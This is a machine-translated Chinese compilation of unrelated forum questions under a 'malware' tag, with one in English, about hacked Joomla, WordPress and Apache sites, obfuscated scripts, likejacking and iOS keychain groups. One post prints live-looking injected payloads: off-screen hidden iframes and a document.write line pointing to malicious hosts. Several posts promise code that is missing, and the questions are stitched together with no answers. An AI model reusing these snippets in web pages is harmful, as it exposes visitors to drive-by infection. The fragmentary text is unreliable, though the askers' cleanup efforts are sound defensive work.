问题标签 [malware]

我正在处理一个被黑的 Joomla 站点，攻击者巧妙地将他的代码隐藏在包含的 javascript 文件中的某个位置。该站点从各地加载了数十个此类文件，并且绝大多数脚本已经打包和混淆，使得逐步调试几乎不可能。此外，我从已经发现的样本中知道，攻击者的 javascript 代码也使用相同的系统打包，并且在视觉上与“合法”代码无法区分。

我知道在执行浏览器端的代码中某处创建了 iframe 并将其附加到 DOM 以引入更严重的漏洞利用代码。但我不知道哪个文件中的哪个代码导致这种情况发生。

有没有办法在浏览器中捕获这个事件并查看正在执行的代码是从哪里加载的？

大概这将在 Chrome 或 Firefox 中。

说到html表单，html混淆真的有用吗？

SO上的一些帖子说这真的是浪费时间，因为有才华的“黑客”总能找到访问表单字段的方法（例如将标签与输入相关联）。

是否有人实施了混淆并实际遭受了攻击？

我想听听你对这个话题的看法。

提前致谢。

我在 wordpress 网站上有这条消息：

无法连接到数据库服务器。找不到数据库 jimbob_je。应用程序出现意外问题。选择 statscurl_id 从statscurl哪里 statscurl_ip = '';

我已经使用sucuri.net进行了检查，但它没有找到任何东西，但仍然出现错误。我从浏览器中检查了页面源，并且在结束标头标记上方有 2 个加密脚本，但我在 header.php 中找不到它们。

这两个脚本在开头有“eval(unescape” )，当页面加载到状态栏中时，会出现 2 个站点： wscripts.org和jquery.com 此外，当使用Firebug检查加载的脚本时，有 2 个称为pop.js和imwb_cab_script。 js，但它们没有加密并且来自上面提到的站点。两者都是随机加载的。

这是imwb_cab_script.js的代码

另一个代码脚本pop.js是：

问题是如何删除出现在浏览器页面源中的这些代码。

你可以在这里看到加密的脚本

关于如何摆脱这些代码的任何其他解决方案？

谢谢！！！

PD：该网站没有使用任何插件

我只是在阅读一些 iOS 应用程序的源代码，我很好奇它的安全性。似乎可以在构建应用程序的权利中指定应用程序的访问组。但是，如果用户在不知情的情况下安装了试图成为特定组的一部分并读取存储在存储中的数据的恶意软件，这难道不是一个安全问题吗？

Apple 应用程序筛选过程是阻止上述攻击的唯一方法吗？还是有一些我错过的权限管理概念？谢谢！

我最近在服务器日志上看到了一些免费文件下载网站，并且在其中一个网站的源代码中有一些可疑的 javascript 代码。我应该担心吗？因为他们可能已经在我们公司的一台计算机中运行或安装了垃圾邮件，

代码

网址

http:\\www.fileice.net/download.php?t=regular&file=rfve

几个月前，隐藏的 iFrame 开始出现在我们专用服务器上每个站点的每个页面上。当我们使用 503 将站点停机进行维护时，iFrame 仍然在停机维护页面上。最终，宿主封锁了 iFrame 的来源，但我们始终没有找到后门。注入的 iFrame 看起来像这样，但包裹在一个样式标签中以进行混淆，并带有各种 URL：

iframe src="http://heusnsy.nl/32283947.html..

我们将较小的站点移到了不同​​的主机上，它们都很好。

我们将主站点移动到同一主机上的新专用服务器上，尽管我们努力锁定服务器 - 防火墙、限制访问、软件更新、检查每个文件 - iFrame 还是返回了。

我们到处寻找它是如何进入的 - 配置文件，htaccess - 但找不到它。

知道隐藏的 iFrame 注入漏洞可能在哪里吗？

编辑：这里有更多细节：运行 Apache 和 PHP 的 Linux 机器。一切的最新版本。注入的代码如下所示：

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

更新：这里有更多信息和我们学到的东西：

主机：Station CentOS Linux 6.3 - x86_64 上的 Linux 2.6.32-279.5.1.el6.x86_64 / Apache 版本 2.2.15 - PHP 5.3.3 (cli)（构建时间：2012 年 7 月 3 日 16:53:21）

1. 服务器本身没有受到损害。

2. 包括 (apache/php) 在内的所有服务都升级到我们系统可用的最新版本。

3. 没有帐户（ftp 或其他）受到损害。

4. 恶意软件在多个受感染站点上同时更改其目标 URL (iframe src=)。（由 unmaskparasites.com 提供）

5. 在更改 src 目标期间，没有执行/运行任何流氓或隐藏进程。

6. TCPDUMP 在离开端口 80 tcp 时获取了恶意软件的代码，但在接收恶意软件的用户的 GET 请求中没有发现任何奇怪的东西——在相应的 apache 访问日志中也没有发现任何奇怪的东西。

7. 在 iFrame 的 src url 地址切换期间，网站文件或 httpd/php 二进制文件没有以任何方式更改 - 由 md5sum 检查提供。

8. 在更改期间，未在已知端口上为已知服务建立恶意连接。防火墙负责其余的工作。

9. rkhunter 和 maldet 没有结果。

10. "</script>"恶意软件 iFrame在任何具有此标签的页面上的第一个标签之后被触发并注入，在此服务器上的所有帐户和网站上。

11. 恶意软件被注入到静态页面和没有数据库连接的站点上。<head> </script></head>（页面有标签就足够了）

12. 没有安装流氓 apache 模块或 php 模块（不包括 mycript.so）。大多数默认的 apache 模块都被挂起并被注释掉。

13. 恶意软件并非一直存在。它来来去去，有时会关闭几个小时，然后出现几个用户并再次熄灭。使其非常难以追踪。

14. 我们网站上运行的 100% 的 php 代码和大多数 javascript 代码（除了 phpmyadmin 之外）是自定义编码的。唯一不是 Jquery 库。

服务器是高流量机器，在日志中搜索/匹配非常慢。每周访问日志可能会超过 15GB。

情况就是这样……这不再是被盗帐户、被黑文件、流氓脚本的问题。这是迄今为止我们所见过的任何事情，原因隐藏在 apache/php 本身的某个地方。（至少这是我们的想法）。非常感谢任何帮助或想法。

以下是 iFrame 注入的示例：

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

每当我尝试访问 JSON-LD 的主页 (http://json-ld.org) 时，我都会被重定向到一个明显的恶意软件站点 (http://commitse.ru/)。我不知道为什么会发生这种情况或访问 JSON-LD 主页的任何解决方法。任何人都可以对此有所了解吗？

谢谢

警告：此链接是 NSFW（它是色情内容）。

1truc2dingue.com/3-une-br%C3%A9silienne-enleve-le-bas.html

今天发生了这样的事情，FB上的一位受欢迎的朋友点击了它。我知道这是恶意软件，而他是一名程序员，所以我开始努力弄清楚它是如何愚弄他的。

这是我发现的。在页面的开头，您会发现：

那里没有什么太隐秘的。当页面被喜欢（事件愚蠢地称为“edge.create”）时，预览消失，视频（初始化为display:none显示）。

当没有明显的“喜欢！”时，如何为页面点赞？按钮。这是脚本背后的技巧。我可以看到脚本使用了已弃用的 FBML，

而且，现代 iFrame API，

I'm having a problem with the website I'm helping manage. Visitors are getting a JavaScript Obfuscation warning from our site. We haven't purposely obfuscated any of our code, which only leaves a malicious attack as the probable cause. It doesn't look like our antivirus is going to fix the problem. I'm not finding a whole lot of useful information on this issue online. What should I do to address this? Is there some utility that would work for a Linux server that may help us find the source of the problem, and remove the threat?

我在我的网站上的一些 .js 文件中找到了这段代码。

我无法解释它来自哪里？是我的 FTP 登录信息泄露的唯一原因吗？有没有人遇到过这个？因此，我的网站像攻击性网站一样被禁止。